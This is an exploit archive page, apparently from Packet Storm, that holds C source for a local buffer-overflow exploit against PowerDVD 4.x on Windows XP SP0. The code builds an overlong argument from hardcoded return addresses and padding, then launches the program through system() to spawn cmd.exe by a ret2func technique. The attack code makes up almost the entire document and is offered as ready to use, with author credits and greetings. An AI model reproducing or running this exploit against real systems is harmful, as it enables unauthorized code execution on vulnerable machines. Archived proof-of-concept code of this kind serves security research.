PowerDVD 4.x local win32 exploit.
9ca71090ce171097c92df0d5c8162aa3c10c60119af5ced564dec9414ab90a9e/*
\ PowerDVD <= 4.? local win32 exploit
/ exploited by darkeagle, discovered by darkeagle
\
/ PoC exploit runs cmd.exe on WinXP SP0 Rus
\ Using ret2func technique :)
/
\ greetz: unl0ckerz { nekd0, xtix, crash-x, choix, antiq, 8ron, 0xdeadbabe }, CoKi, rave etc.
/
\ mailto: darkeagle [at] unl0ck [dot] org
/ darkeagle [at] linkin-park [dot] cc
\ http://unl0ck.org
/
\
*/
#include <stdio.h>
#include <string.h>
#include <windows.h>
int main(int argc, char *argv[])
{
char cmd[500];
char *path;
printf("\n\n* PowerDVD <= 4.0 local exploit *\n\tby darkeagle\n\nusage: pdvdx.exe <path>\n\n");
if ( argc < 2 ) { printf(" need an argument!\n"); exit(0); }
path = argv[1];
sprintf(cmd, "%s ", path);
strcat(cmd, "\x44\x80\xC1\x77");
strcat(cmd, "\xDC\x7A\xC2\x77");
strcat(cmd, "\x35\x13\xC0\x77");
memset(cmd+strlen(cmd), 0x55, 299);
system(cmd);
exit(0);
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed